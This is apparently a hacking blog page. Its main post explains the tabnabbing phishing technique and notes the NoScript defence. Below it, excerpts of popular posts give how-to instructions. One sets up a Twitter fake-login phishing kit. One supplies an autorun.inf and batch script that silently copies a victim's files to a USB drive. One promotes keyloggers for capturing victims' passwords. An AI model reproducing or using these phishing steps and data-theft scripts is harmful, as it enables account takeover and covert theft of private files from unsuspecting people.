Skip to main content

Tabnabbing

Tabnabbing is a computer exploit and phishing attack, which persuades
users to submittheir login details and passwords to popular websites
by impersonating those sites and convincing the user that the site is
genuine. The attack's name was coined in early 2010 by
Aza Raskin, a security researcher and design expert.

The attack takes advantage of user trust and inattention to detail in regard
to tabs, and the ability of modern web pages to rewrite tabs and their
contents a long time after the page is loaded. Tabnabbing operates in
reverse of most phishing attacks in that it doesn’t ask users to click
on a obfuscated link but instead loads a fake page in one of the open tabs
in your browser.

The exploit employs scripts to rewrite a page of average interest with
an impersonation of a well-known website, when left unattended for some
time. A user who returns after a while and sees the rewritten page may
be induced to believe the page is legitimate and enter their login, password
and other details that will be used for improper purposes. The attack can
be made more likely to succeed if the script checks for well known
Websites the user has loaded in the past or in other tabs, and loads a
simulation of the same sites. This attack can be done even if JavaScript is
disabled, using the "meta refresh" meta element, an HTML attribute used
for page redirection that causes a reload of a specified new page after a
given time interval.

The NoScript extension for Mozilla Firefox defends both from the JavaScript-
based and from the scriptless attack, based on meta refresh, by preventing
inactive tabs from changing the location of the page.

source

Comments

Popular posts from this blog

How to Hack a Twitter Account

Twitter is one of the topmost widely running social networking sites,Its alexa ranking is 14(As per now).So therefore it is largely becoming target of hackers,Many requests keep coming to me ,please tell us a way to Hack twitter accounts or How to hack twitter accounts,so therefore i today i have written a post on How to hack twitter accounts Well for this purpose i will tell you the most used method to hack twitter accounts i.e phishing How to hack twitter accounts - Phishing First of all download:   Twitter fake login page ( Latest Version ) Click Here To Download : NOTE : You will be asked to enter a password while extracting the Documents. Please Insert the password as : IHA Step 1 First extract the contents into a folder Step 2 Then edit login.php .(right click and then select edit) In that ,find (CTRL+F) ‘http://rafayhackingarticles.blogspot.com’ then change it to your destined URL but don’t forget ‘'. Now rename the script to pass.php and save it

How to steal data using your USB flash drive

Hello friends, In this tutorial we will revealed a new tweak which is illegal but sharing here for educational purpose. This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice. Process is very simple as we have to add only 4-5 notepad files in the flash drive. Follow the following steps :- 1. Create a notepad file with name autorun.inf nad copy the following code. [autorun] icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat 2. Create another notepad file of name file.bat and copy the following code. @echo off :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics” %backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites” %backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”

How to use Keyloggers – Detailed Tutorial and FAQs

Here is a DETAILED tutorial which contains every possible information that you need to know about keyloggers which includes how to use it, how it works etc. WARNING: I highly recommend that you read this post completely since every single piece of information is important. I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go… 1. What is a Keylogger? A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password. 2. How Keylogger works? Once the keylogger is installed on a PC, it starts operating in the backgrou